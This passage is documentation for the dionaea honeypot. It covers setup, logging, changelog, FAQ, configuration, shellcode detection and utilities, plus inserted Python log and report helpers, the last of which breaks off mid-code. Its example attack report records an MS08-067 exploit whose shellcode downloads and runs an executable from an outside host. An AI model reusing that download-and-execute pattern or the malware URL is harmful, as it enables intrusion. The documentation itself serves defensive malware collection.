1650   Vagrant
1651       Vagrant  can  be  used  to  setup a development environment for dionaea
1652       within minutes.
1653
1654   Install
1655       First install Vagrant and VirtualBox.
1656
1657       If everything has been setup correctly clone the git repository and use
1658       vagrant to bootstrap and start the environment.
1659
1660          $ git clone https://github.com/DinoTools/dionaea.git
1661          $ cd dionaea/vagrant
1662          $ vagrant up
1663
1664       All files will be installed in the /opt/dionaea directory.
1665
1666   Run
1667       Access  the  development  environment,  edit the config files and start
1668       dionaea with the following command.
1669
1670          $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1671
1672   Rebuild and test
1673       To rebuild and install dionaea run the following commands.
1674
1675          $ cd /vagrant
1676          $ make
1677          $ sudo make install
1678
1679       See Run for more information on how to start dionaea.
1680
1681   Ubuntu 14.04
1682       Instead of using Vagrant you can use an Ubuntu 14.04 system to set up
1683       your development environment.  In this section we will use the scripts
1684       used to set up the Vagrant environment to bootstrap a fresh Ubuntu
1685       system.  If you like you can follow the ../installation ‘From Source’
1686       guide to set up everything by hand.
1687
1688   Install
1689       First install Ubuntu.
1690
1691       If everything has been setup correctly clone the git repository and run
1692       the bootstrap script.
1693
1694          $ git clone https://github.com/DinoTools/dionaea.git
1695          $ cd dionaea/vagrant
1696          $ ./bootstrap.sh
1697
1698       All files will be installed in the /opt/dionaea directory.
1699
1700   Rebuild and test
1701       Rebuild, install and start dionaea from the root of the git repository.
1702
1703          $ make
1704          $ sudo make install
1705          $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1706
1707       This can also be done in one line.
1708
1709          $ make && sudo make install && sudo dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1710
1711   Find memory leaks
1712       To  enable AddressSanitizer you have to add the following parameters to
1713       the configure script and rebuild dionaea.
1714
1715          --disable-shared CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb"
1716
1717       When running dionaea it will print information about overflow  errors.
1718       If  you  would  like to stop execution you have to export an additional
1719       environment variable.
1720
1721          export ASAN_OPTIONS='abort_on_error=1'
1722
1723       To get a stacktrace you can use gdb and add  an  additional  breakpoint
1724       break __asan_report_error.
1725
1726       It is also possible to use the asan_symbolize.py Python 2 script to
1727       extract additional information.
1728
1729          /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg  2>&1 | python asan_symbolize.py
1730
1731   Logging
1732       Logging should be used to report errors and for debugging purposes.  It
1733       must  not be used to report attacks.  Incidents should be used for this
1734       purpose.  For more information have a look at the ihandler section.
1735
1736       Comparison glib2 and Python
1737
1738                                ┌─────────┬──────────┐
1739                                │glib2    │ Python   │
1740                                ├─────────┼──────────┤
1741                                │debug    │ debug    │
1742                                ├─────────┼──────────┤
1743                                │info     │ info     │
1744                                ├─────────┼──────────┤
1745                                │warning  │ warning  │
1746                                ├─────────┼──────────┤
1747                                │critical │ error    │
1748                                ├─────────┼──────────┤
1749                                │error    │ critical │
1750                                └─────────┴──────────┘
1751
1752       WARNING:
1753          In glib2 a critical message means critical warning. But in Python  a
1754          critical message is handled as critical error.
1755
1756       WARNING:
1757          An  error  message in glib2 or a critical message in a Python module
1758          will terminate the program immediately.
1759
1760   Incident
1761       Some of the incidents reported by the dionaea core are listed below.
1762
1763       dionaea.connection.tcp.accept:
1764          A new TCP connection has been accepted by dionaea.
1765
1766       dionaea.connection.tls.accept:
1767          A new SSL/TLS connection has been accepted by dionaea.
1768
1769       dionaea.connection.tcp.connect:
1770          Reported after dionaea has connected to an external service via TCP.
1771
1772       dionaea.connection.tls.connect:
1773          Reported after dionaea has connected to an external service via
1774          SSL/TLS.
1775
1776       dionaea.connection.udp.connect:
1777          Reported after dionaea has connected to an external service via UDP.
1778
1779       dionaea.connection.free:
1780          A connection has been closed and freed.
1781
1782       dionaea.connection.tcp.listen:
1783          Fired after a TCP service has been bound and is listening for
1784          incoming connections.
1785
1786       dionaea.connection.tls.listen:
1787          Fired after an SSL/TLS service has been bound and is listening for
1788          incoming connections.
1789
1790       dionaea.connection.tcp.pending:
1791
1792       dionaea.connection.tcp.reject:
1793          An incoming connection has been rejected by the server.
1794
1795       dionaea.connection.link.early:
1796
1797       dionaea.connection.link:
1798          Reported  to  give the log management the chance to link two connec‐
1799          tions.
1800

CHANGELOG

1802   0.8.0 - (master)
1803   0.7.0 - (2018-05-01)
1804       build
1805
1806       · Add initial cmake support
1807
1808       ci
1809
1810       · Add Debian 9
1811
1812       dionaea
1813
1814       · Fix build error with OpenSSL 1.1.0
1815
1816       · Improve OpenSSL 1.1.0 support
1817
1818       · Cleanup connection code
1819
1820       · Enable bistream for SSL/TLS connections (Thanks Aws0mus)
1821
1822       · Fixing chroot bugs (Thanks Michal Ambroz)
1823
1824       doc
1825
1826       · Add additional information
1827
1828       · Doxygen config file for dionaea c core
1829
1830       · Ubuntu 16.04 install instructions
1831
1832       package
1833
1834       · Remove old and deprecated debian package config
1835
1836       python
1837
1838       · Fix typo in config key
1839
1840       · Fix hardcoded python path
1841
1842       · Fix compilation on CentOS7 (Thanks Michal Ambroz)
1843
1844       python/http
1845
1846       · Initial support to handle SOAP requests
1847
1848       python/log_incident
1849
1850       · Improve hash generator
1851
1852       · Fix bug if parent is unknown
1853
1854       · Remove IDs from list if processed
1855
1856       python/mongo
1857
1858       · Initial support to simulate a MongoDB server
1859
1860       python/pyev
1861
1862       · Update from 0.8 to 0.9 to support Python >= 3.6
1863
1864       python/smb
1865
1866       · Add support for WannaCry and SambaCry (Big thanks to gento)
1867
1868       · Add additional config options to change identity
1869
1870       python/util
1871
1872       · Find Download commands for Linux shell
1873
1874   0.6.0 - (2016-11-14)
1875       dionaea
1876
1877       · Fix build for musl lib
1878
1879       doc
1880
1881       · Fix install instructions
1882
1883       · Extend README.md
1884
1885       python/blackhole
1886
1887       · New service/Initial version
1888
1889       python/emu_scripts
1890
1891       · New handler to analyse downloaded scripts
1892
1893       · Detect VBScript and PowerShell
1894
1895       · Limit number of subdownloads
1896
1897       python/http
1898
1899       · Clean up
1900
1901       · Use state vars instead of strings
1902
1903       · Add template support
             · Jinja 2 template engine
             · nginx template
1904
1905       python/mysql
1906
1907       · Dump files from SELECT queries
1908
1909       · Extract URLs from functions
1910
1911       · Variable handler
1912
1913       · Support for selecting variables
1914
1915       python/p0f
1916
1917       · Fix decode error
1918
1919       python/pptp
1920
1921       · Fix error if config is empty
1922
1923   0.5.1 - 2016-09-05
1924       dionaea
1925
1926       · Don’t report ‘connection.free’ incident too early to prevent
1927         segmentation faults
1928
1929   0.5.0 - 2016-08-06
1930       dionaea
1931
1932       · Handle byte objects in incidents
1933
1934       · Bump required Python version from 3.2 to 3.4
1935
1936       python/http
1937
1938       · Detect Shellshock attacks
1939
1940       python/log_incident
1941
1942       · Initial support to export raw incident information
1943
1944       python/log_sqlite
1945
1946       · Log credentials from the ftp service
1947
1948       python/memcache
1949
1950       · Initial support for the memcached protocol
1951
1952       python/pptp
1953
1954       · Clean up
1955
1956       · Handle CallClearRequests packets
1957
1958       · Values  for  hostname, vendor name and firmware revision are now cus‐
1959         tomizable
1960
1961       python/util
1962
1963       · New function to detect shellshock attacks and report detected URLs
1964
1965   0.4.2 - 2016-07-02
1966       doc
1967
1968       · Add information about log levels for developers
1969
1970       python/*
1971
1972       · Replace all critical log messages with error messages
1973
1974       · Catch exceptions in handle_io_in()  and  handle_io_out()  to  improve
1975         stability
1976
1977       · Catch exceptions in incident handlers
1978
1979       python/sip
1980
1981       · Fix error while reading config values
1982
1983       python/upnp
1984
1985       · Fix errors in log messages
1986
1987       more
1988
1989       · Add templates to create issues and merge requests on github
1990
1991   0.4.1 - 2016-06-14
1992       core
1993
1994       · Initialize stdout logger earlier
1995
1996       · Log error,critical and warning by default
1997
1998       python/*
1999
2000       · In glib2 critical is a critical warning
2001
2002       · Add support for exceptions
2003
2004       · Check file path and show warnings
2005
2006       python/log_json
2007
2008       · Add support for flat object lists to work with ELK stack
2009
2010   0.4.0 - 2016-05-31
2011       core
2012
2013       · Replace lcfg with Key-value file parser from glib
2014
2015       ci
2016
2017       · Add build tests for Ubuntu 14.04, Ubuntu 16.04 and Debian 8
2018
2019       doc
2020
2021       · Add initial documentation for missing modules
2022
2023       · Update documentation to reflect config changes
2024
2025       · Add processor documentation
2026
2027       python/*
2028
2029       · Replace lcfg with yaml configs
2030
2031       · Remove deprecated incident handlers (logxmpp, mwserv, SurfIDS)
2032
2033       · Rename incident handlers from logsql to log_sqlite
2034
2035       · Rename incident handlers from uniqdownload to submit_http_post
2036
2037       python/mysql
2038
2039       · Enable processor pipeline
2040
2041   0.3.0 - 2016-03-30
2042       core
2043
2044       · Code clean up (Thanks to Katarina)
2045
2046       · Vagrant based dev environment
2047
2048       · Customize ssl/tls parameters for autogenerated certificates
2049
2050       doc
2051
2052       · Initial version of sphinx based documentation
2053
2054       python/ftp
2055
2056       · Support to customize response messages
2057
2058       · Small fixes
2059
2060       python/hpfeeds
2061
2062       · Initial ihandler support (Thanks to rep)
2063
2064       python/http
2065
2066       · Customize HTTP response headers
2067
2068       · Return HTTP/1.1 instead of HTTP/1.0
2069
2070       python/log_json
2071
2072       · Initial ihandler support
2073
2074       python/mqtt
2075
2076       · Initial protocol support (Thanks to gento)
2077
2078       python/pptp
2079
2080       · Initial protocol support (Thanks to gento)
2081
2082       python/upnp
2083
2084       · Initial protocol support (Thanks to gento)
2085
2086   0.2.1 - 2014-07-16
2087       core
2088
2089       · Support for cython and cython3
2090
2091       · Fixes to build with glib 2.40
2092
2093       · Remove build warnings
2094
2095       · Support libnl >= 3.2.21
2096
2097       python/http
2098
2099       · Fix unlink() calls
2100
2101       python/virustotal
2102
2103       · virustotal API v2.0
2104
2105   0.2.0 - 2013-11-02
2106       Last commit by original authors.
2107
2108   0.1.0
2109       · Initial release.
2110

FAQ

2112       WARNING:
2113          The documentation is work in progress.
2114
2115   Build/Install
2116       I get gcc: command not found?
2117          Install gcc.
2118
2119       How to uninstall it?
2120          rm -rf /opt/dionaea
2121
2122       I  get  binding.pyx:…:  undeclared  name  not builtin: bytes during the
2123       python modules build.
2124          Install a recent cython version
2125
2126       I get Python.h not found during compiling cython
2127          Install appropriate headers for your python interpreter
2128
2129       I do not use ubuntu/debian and the  instructions  are  useless  for  me
2130       therefore.
2131          I  use  debian/ubuntu, and therefore I can only provide instructions
2132          for debian/ubuntu, but you are free to send me a diff for your oper‐
2133          ating system
2134
2135       I use Redhat/Centos 5 and the installation is frustrating and a mess as
2136       nothing works.
2137          That’s right, but I did not choose your operating system.  Here is a
2138          list of outdated or missing packages for your chosen distribution:
2139          all. Yes, you’ll even have to install glib (you’ll have 2.10 where
2140          2.20 is required) from source.  Getting python3 compiled with a
2141          recent sqlite3 version installed to /opt/dionaea requires editing
2142          the setup.py file (patch <http://p.carnivore.it/KDIFWt>).  I
2143          experienced this wonderful operating system myself … You really have
2144          to love your distro to stick with it, even if it ships software
2145          versions your grandma saw released in her youth.  Centos is the best
2146          distro to change distros.  No matter what you choose, it can’t get
2147          worse.
2148
2149       Unable to build.
2150
2151              ==> default: cp build/*/dionaea/*.so /opt/dionaea/lib/dionaea/python.so
2152              ==> default: cp:
2153              ==> default: target ‘/opt/dionaea/lib/dionaea/python.so’ is not a directory
2154
2155              ==> default: libtool: Version mismatch error.  This is libtool 2.4.6 Debian-2.4.6-2, but the
2156              ==> default: libtool: definition of this LT_INIT comes from libtool 2.4.2.
2157              ==> default: libtool: You should recreate aclocal.m4 with macros from libtool 2.4.6 Debian-2.4.6-2
2158              ==> default: libtool: and run autoconf again.
2159
2160          Try to clean your build environment.
2161
2162          WARNING:
2163              This will remove all ignored and untracked files from the
2164              directory.  Use --dry-run first.
2165
2166              git clean -xdf
2167
2168   Run
2169       I  get  OperationalError  at  unable  to  open database file when using
2170       logsqlite and it does not work at all
2171          Read the logsql instructions <#logsql>
2172
2173       I get a Segmentation Fault
2174          Read the segfault instructions <#segfault>
2175
2176       I logrotate, and after logrotate dionaea does not log anymore.
2177          Read the logrotate instructions <#logging>
2178
2179       p0f does not work.
2180          Make sure you have p0f 2.0.8 and dionaea does not listen on ::, p0f
2181          can’t deal with IPv6.
2182
2183       I’m facing a bug, it fails, and I can’t figure out why.
2184          Explain the problem, if I’m interested in the nature of the problem,
2185          as it does not sound like pebcak, I may ask for a  shell/screen  and
2186          have  a  look  myself,  and if it is worth it, you’ll even get a FAQ
2187          entry for some specialties of your OS.
2188
2189       Unable to bind to port after dropping privileges
2190          Dropping privileges and binding to ports lower than 1024 is only
2191          supported on Linux systems.  If some of the optional build
2192          dependencies are missing dionaea might not be able to bind to these
2193          ports either.  After enabling all log levels it should display log
2194          messages like in the example below.
2195
2196              [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2197              [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2198              [10052017 15:58:17] connection connection.c:230: Could not bind 1.2.3.4:21 (Permission denied)
2199
2200          To fix this issue you have to install the kernel  headers  for  your
2201          kernel  and  rebuild  dionaea.  If everything works as it should you
2202          might get log messages like in the example below.   You  might  have
2203          noticed  that  there is now a pchild section.  This means dionaea is
2204          using a child process with extended privileges to bind to the port.
2205
2206              [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2207              [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2208              [10052017 15::58:17] pchild pchild.c:199: sending msg to child to bind port ...
2209              [10052017 15::58:17] pchild pchild.c:218: child could bind the socket!
2210              [10052017 15::58:17] connection connection.c:316: ip '1.2.3.4' node '1.2.3.4:21'
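       A small checker for the two log excerpts above, added here as an example
       and not part of dionaea: it parses the log line format shown, pairs each
       bind_local attempt with the outcome that follows it, and reports whether
       a privileged port was bound directly, bound through the pchild helper, or
       refused.  The line format and the meaning of the connection.c "ip ...
       node ..." line as a success marker are assumptions taken from the
       excerpts.

```python
"""Diagnose privileged-port binds from dionaea log lines.

Added example, not part of dionaea.  Assumes the line format shown in the
FAQ excerpts: "[ddmmyyyy HH:MM:SS] <domain> <file.c:line>: <message>".
"""
import re
from typing import Dict, Iterable

# The timestamp class tolerates the doubled colon ("15::58:17") seen in the
# pchild lines of the excerpt.
LOG_RE = re.compile(r"^\[(?P<ts>\d{8} [\d:]+)\] (?P<domain>\S+) (?P<src>\S+:\d+): (?P<msg>.*)$")
BIND_RE = re.compile(r"^bind_local socket \d+ (?P<ep>\S+)$")
FAIL_RE = re.compile(r"^Could not bind (?P<ep>\S+) \((?P<why>[^)]+)\)$")
NODE_RE = re.compile(r"^ip '\S+' node '(?P<ep>\S+)'$")


def port_of(endpoint: str) -> int:
    """'1.2.3.4:21' -> 21, '[::1]:21' -> 21."""
    return int(endpoint.rsplit(":", 1)[1])


def check_binds(lines: Iterable[str]) -> Dict[str, str]:
    """Map each endpoint named in a bind_local line to one of
    'bound', 'bound-via-pchild', 'failed: <reason>' or 'pending'."""
    status: Dict[str, str] = {}
    current = None  # endpoint of the most recent bind_local attempt
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        msg = m["msg"]
        b = BIND_RE.match(msg)
        if b:
            current = b["ep"]
            status[current] = "pending"
            continue
        f = FAIL_RE.match(msg)
        if f:
            status[f["ep"]] = "failed: " + f["why"]
            continue
        if current and m["domain"] == "pchild" and "child could bind" in msg:
            status[current] = "bound-via-pchild"
            continue
        n = NODE_RE.match(msg)
        if n and status.get(n["ep"]) == "pending":
            # Assumption: this connection.c line follows a successful bind
            # that did not need the child process.
            status[n["ep"]] = "bound"
    return status


def diagnose(status: Dict[str, str]) -> Dict[str, str]:
    """Turn the per-endpoint status into the advice the FAQ entry gives."""
    advice: Dict[str, str] = {}
    for ep, st in status.items():
        if st.startswith("failed") and "Permission denied" in st and port_of(ep) < 1024:
            advice[ep] = ("privileged port refused after privilege drop: pchild did "
                          "not bind it; install the kernel headers and rebuild dionaea")
        elif st == "bound-via-pchild":
            advice[ep] = "ok: bound by the privileged child process"
        elif st == "bound":
            advice[ep] = "ok: bound directly"
        else:
            advice[ep] = "unresolved: " + st
    return advice


# Sample input: the two excerpts from the FAQ entry above, embedded verbatim.
FAIL_LOG = """\
[10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
[10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
[10052017 15:58:17] connection connection.c:230: Could not bind 1.2.3.4:21 (Permission denied)
""".splitlines()

OK_LOG = """\
[10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
[10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
[10052017 15::58:17] pchild pchild.c:199: sending msg to child to bind port ...
[10052017 15::58:17] pchild pchild.c:218: child could bind the socket!
[10052017 15::58:17] connection connection.c:316: ip '1.2.3.4' node '1.2.3.4:21'
""".splitlines()

if __name__ == "__main__":
    for name, log in (("failing", FAIL_LOG), ("working", OK_LOG)):
        print(name, diagnose(check_binds(log)))
```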
2211

TIPS AND TRICKS

2213       WARNING:
2214          The documentation is work in progress.
2215
2216   Rotate bistream files
2217       Dionaea does not have, and may never have, a function or option to
2218       rotate the bistream files.  But you can do this by using a cron job and
2219       a simple shell script.
2220
2221       Feel free to use and modify the script below.
2222
2223          #!/bin/bash
2224
2225          # Compress bistream files older than 2 days
2226          find /var/lib/dionaea/bistreams/* -type f -mtime +2 -exec gzip {} \;
2227
2228          # Clear bistream logs from dionaea every week
2229          find /var/lib/dionaea/bistreams/* -type f -mtime +7 -exec rm {} \;
2230          find /var/lib/dionaea/bistreams/* -type d -empty -delete
2231

SUPPORT

2233   Cui honorem, honorem
2234       Google:
2235          Google has supported 3 students to work on dionaea during GSoc 2009,
2236          GSoc 2010 and GSoc 2011.
2237
2238       SURFnet:
2239          SURFnet has supported the project in the past (2010?-2014?).  Working
2240          with SURFnet is a real pleasure.
2241
2242   Support
2243       If you are getting frustrated, because things do not work for you and
2244       you already read the FAQ, join the mailing list and share your
2245       experience, or the chat.
2246
2247       GitHub
2248          Use the issue tracker to report any problem.
2249
2250          Website: Issue tracker
2251
2252       IRC
2253          From time to time some of the developers join the #nepenthes channel
2254          on freenode. irc://irc.freenode.org/nepenthes
2255
2256       Mailing List:
2257          Only  a few messages every year.  Seems to be dead, no message since
2258          2015.
2259
2260          Website: Mailinglist nepenthes-devel
2261
2262   Links
2263          · GSoC 2009 Project #10 http://honeynet.org/gsoc/project10
2264
2265          · The Honeynet Project
2266
2267       Old documentation:
2268

EXPLOITATION

2270       Attackers do not seek your service,  attackers  want  to  exploit  you,
2271       they’ll  chat  with the service for some packets, and afterwards send a
2272       payload. dionaea has to detect and evaluate the payload to be  able  to
2273       gain a copy of the malware. In order to do so, dionaea uses libemu.
2274
2275       Given  certain  circumstances, libemu can detect shellcode, measure the
2276       shellcode, and if required even execute the shellcode. Shellcode detec‐
2277       tion  is  done  by  making use of GetPC heuristics, others wrote papers
2278       about it, we decided to write libemu to do so. This detection is rather
2279       time consuming, and therefore done using threads.
2280
2281       The  part  of  dionaea  which takes care of the network io can create a
2282       copy of all in/output run for a connection, this copy is passed to  the
2283       detection  facility,  which  is a tree of detection facilities, at this
2284       moment there is only a single leaf, the emu plugin. The emu plugin uses
2285       threads and libemu to detect and profile/measure shellcode.
2286
2287       Shellcode measurement/profiling is done by running the shellcode in the
2288       libemu vm and recording API calls and  arguments.  For  most  shellcode
2289       profiling  is  sufficient,  the recorded API calls and arguments reveal
2290       enough information to get an idea of the attackers  intention  and  act
2291       upon  them.  For  multi-stage  shellcode,  where the first exploitation
2292       stage of the shellcode would  retrieve  a  second  shellcode  from  the
2293       attacker, profiling is not sufficient, as we lack the information ‘what
2294       to do’ from the second stage of the shellcode, in this case we need  to
2295       make  use  of shellcode execution. Shellcode execution is basically the
2296       same as shellcode profiling, the only difference is not  recording  the
2297       api  calls,  and  we  allow  the shellcode to take certain actions, for
2298       example creating a network connection.
2299
2300   Payloads
2301       Once we have the payload, and the profile, dionaea  has  to  guess  the
2302       intention, and act upon it.
2303
2304   Shells - bind/connectback
2305       This payload offers a shell (cmd.exe prompt) to the attacker, either by
2306       binding a port and waiting for the attacker to connect to us again, or
2307       by connecting to the attacker. In both cases, dionaea offers a cmd.exe
2308       emulation to the attacker, parses the input, and acts upon the input,
2309       usually the instructions download a file via ftp or tftp.
2310
2311   URLDownloadToFile
2312       These  shellcodes use the URLDownloadToFile api call to retrieve a file
2313       via http, and execute the retrieved file afterwards
2314
2315   Exec
2316       Making use of WinExec, these shellcodes execute a single command which
2317       has to be parsed and processed like the commands of the
2318       bind/connectback shell.
2319
2320   Multi Stage Payloads
2321       We never know what the second stage is, therefore  libemu  is  used  to
2322       execute the shellcode in the libemu vm.
2323

DOWNLOADS

2325       Once dionaea gained the location of the file the attacker wants it to
2326       download from the shellcode, dionaea will try to download the file.
2327       The protocol to download files via tftp and ftp is implemented in
2328       python (ftp.py and tftp.py) as part of dionaea, downloading files via
2329       http is done in the curl module - which makes use of libcurl’s awesome
2330       http capabilities. Of course libcurl can run downloads for ftp too, but
2331       the ftp services embedded in malware are designed to work with the
2332       windows ftp.exe client, and fail for others.
2333

SUBMIT

2335       Once dionaea got a copy of the worm attacking her, we may want to store
2336       the  file  locally for further analysis, or submit the file to some 3rd
2337       party for further analysis.
2338
2339       dionaea can http/POST the file to several services like CWSandbox, Nor‐
2340       man Sandbox or VirusTotal.
2341

CONFIGURATION - DIONAEA.CONF

2343       If you want to change the software, it is really important to
2344       understand how it works, therefore please take the time to learn how
2345       it works.  dionaea.conf is the main configuration file; it consists
2346       of sections for:
2347
2348          · logging
2349
2350          · processors
2351
2352          · downloads
2353
2354          · bistreams
2355
2356          · submit
2357
2358          · listen
2359
2360          · modules
2361
2362   logging
2363       The logging section controls … logging, you can specify log domains and
2364       loglevel for different logfiles.  As dionaea is pretty … verbose, it is
2365       useful to rotate the logfiles using logrotate.
2366
2367          # logrotate requires dionaea to be started with a pidfile
2368          # in this case -p /opt/dionaea/var/run/dionaea.pid
2369          # adjust the path to your needs
2370          /opt/dionaea/var/log/dionaea*.log {
2371                  notifempty
2372                  missingok
2373                  rotate 28
2374                  daily
2375                  delaycompress
2376                  compress
2377                  create 660 root root
2378                  dateext
2379                  postrotate
2380                          kill -HUP `cat /opt/dionaea/var/run/dionaea.pid`
2381                  endscript
2382          }
2383
2384       /etc/logrotate.d/dionaea
2385
2386   modules
2387       downloads specify where to store downloaded malware.  bistreams specify
2388       where to store bi-directional streams, these are pretty useful when
2389       debugging, as they allow to replay an attack on ip-level, without
2390       messing with pcap&tcpreplay, which never worked for me.  submit
2391       specifies where to send files to via http or ftp, you can define a new
2392       section within submit if you want to add your own service.  listen sets
2393       the addresses dionaea will listen to. The default is all addresses it
2394       can find, this mode is called getifaddrs, but you can set it to manual
2395       and specify a single address if you want to limit it.  modules is the
2396       most powerful section, as it specifies the modules to load, and the
2397       options for each module.
2398
2399   logsql
2400       This section controls the logging to the sqlite database.  logsql  does
2401       not  work when chrooting - python makes the path absolute and fails for
2402       requests after chroot().
2403
2404       logsql requires the directory where the logsql.sqlite file  resides  to
2405       be  writeable  by  the  user, as well as the logsql.sqlite file itself.
2406       So, if you drop user privs, make sure the user you drop to  is  allowed
2407       to read/write the file and the directory.
2408
2409          chown MYUSER:MYGROUP /var/lib/dionaea -R
2410
2411       To query the logsql database, I recommend looking at the
2412       readlogsqltree.py <#readlogsqltree> script, for visualisation the
2413       gnuplotsql <#gnuplotsql> script.
2414
2415       The blog on logsql:
2416
2417          · 2009-11-06 dionaea sql logging
2418
2419          · 2009-12-08 post it yourself
2420
2421          · 2009-12-12 sqlite performance
2422
2423          · 2009-12-14 virustotal fun
2424
2425          · 2009-12-15 paris mission pack avs
2426
2427          · 2010-06-06 data visualisation
2428
2429   logxmpp
2430       This  section controls the logging to xmpp services. If you want to use
2431       logxmpp, make sure to enable logxmpp in the  ihandler  section.   Using
2432       logxmpp allows you to share your new collected files with other sensors
2433       anonymously.
2434
2435       The blog on logxmpp:
2436
2437          · 2010-02-10 xmpp backend
2438
2439          · 2010-05-12 xmpp take #2
2440
2441          · 2010-05-15 xmpp take #3
2442
2443       pg_backend <#pg_backend> can be used as a backend for xmpp logging
2444       sensors.
2445
2446   p0f
2447       Not enabled by default, but recommended: the p0f service, enable by
2448       uncommenting p0f in the ihandlers section of the python modules
2449       section, and start p0f as suggested in the config. It costs nothing,
2450       and gives some pretty cool, even if outdated, information about the
2451       attacker’s operating system, and you can look them up from the sqlite
2452       database, even the rejected connections.  If you face problems, here
2453       are some hints.
2454
2455   ihandlers
2456       ihandlers  section  is  used  to specify which ihandlers get started by
2457       ihandlers.py.  You do not want to miss p0f and logsql.
2458
2459   services
2460       services controls which services will get started by services.py
2461

UTILS

2463       Dionaea ships with some utils.  As these utils are written in python
2464       and rely on the python3 interpreter dionaea requires to operate, this
2465       software can be found in modules/python/utils:
2466
2467          readlogsqltree <#readlogsqltree> -
2468          modules/python/readlogsqltree.py
2469
2470       readlogsqltree is a python3 script  which  queries  the  logsql  sqlite
2471       database  for attacks, and prints out all related information for every
2472       attack.  This is an example for an attack, you  get  the  vulnerability
2473       exploited, the time, the attacker, information about the shellcode, the
2474       file offered for download, and even the virustotal report for the file:
2475
          2010-10-07 20:37:27
            connection 483256 smbd tcp accept 10.0.1.11:445 <- 93.177.176.190:47650 (483256 None)
            dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
            dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
            dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
            dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
            dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
            dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
            dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
            dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
            dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
            dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
            dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
            dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
            profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://208.53.183.158/m.exe', '60.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['60.exe', '895'], 'call': 'WinExec'}, {'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
            offer: http://208.53.183.158/m.exe
            download: 3eab379ddac7d80d3e38399fd273ddd4 http://208.53.183.158/m.exe
              virustotal 2010-10-07 04:59:07 5/38 (13%) http://www.virustotal.com/file-scan/report.html?id=265e39edcba9d9004451601544e625f2d3d04f837d0aaf1f8464cb2c819c1939-1286420347
                names 'High Risk Fraudulent Security Program' 'Suspicious file' 'Trojan.DownLoader1.27100' 'Worm.Win32.Rimecud' 'Worm:Win32/Rimecud.B'

       To create such a report of your own honeypot's activity for the last 24
       hours, run:

          ./readlogsqltree.py  -t $(date '+%s')-24*3600 /var/lib/dionaea/logsql.sqlite


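       A report of the same shape can be built with a few lines of python; the
       following is an added example, not dionaea's readlogsqltree.py. The
       table and column names follow the logsql schema as I remember it and
       are an assumption (check them against .schema in sqlite3 on your own
       logsql.sqlite); the database it reports on is constructed in memory
       from the attack shown above.

```python
"""Added example, not readlogsqltree.py: a 24h attack report over a logsql
sqlite database. The schema subset below is an ASSUMPTION about logsql."""
import sqlite3
import time

SCHEMA = """
CREATE TABLE connections (connection INTEGER PRIMARY KEY, connection_type TEXT,
  connection_transport TEXT, connection_protocol TEXT, connection_timestamp INTEGER,
  local_host TEXT, local_port INTEGER, remote_host TEXT, remote_port INTEGER);
CREATE TABLE dcerpcrequests (dcerpcrequest INTEGER PRIMARY KEY, connection INTEGER,
  dcerpcrequest_uuid TEXT, dcerpcrequest_opnum INTEGER);
CREATE TABLE offers (offer INTEGER PRIMARY KEY, connection INTEGER, offer_url TEXT);
CREATE TABLE downloads (download INTEGER PRIMARY KEY, connection INTEGER,
  download_url TEXT, download_md5_hash TEXT);
"""
SRVSVC = "4b324fc8-1670-01d3-1278-5a47bf6ee188"


def build_sample_db(now):
    """Constructed data: the smbd attack from the text (an hour old) plus a
    three day old httpd connection that made no request at all."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.execute("INSERT INTO connections VALUES (483256,'accept','tcp','smbd',?,"
               "'10.0.1.11',445,'93.177.176.190',47650)", (now - 3600,))
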